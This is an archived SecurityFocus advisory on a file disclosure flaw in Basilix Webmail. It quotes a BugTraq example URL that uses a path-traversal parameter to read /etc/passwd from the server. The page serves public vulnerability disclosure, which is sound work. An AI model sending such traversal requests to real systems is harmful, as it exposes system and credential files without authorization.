Basilix Webmail File Disclosure Vulnerability

"karol _" <su@poczta.arena.pl> provided this example in a BugTraq posting:

http://beta.basilix.org/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah


 

Privacy Statement
Copyright 2010, SecurityFocus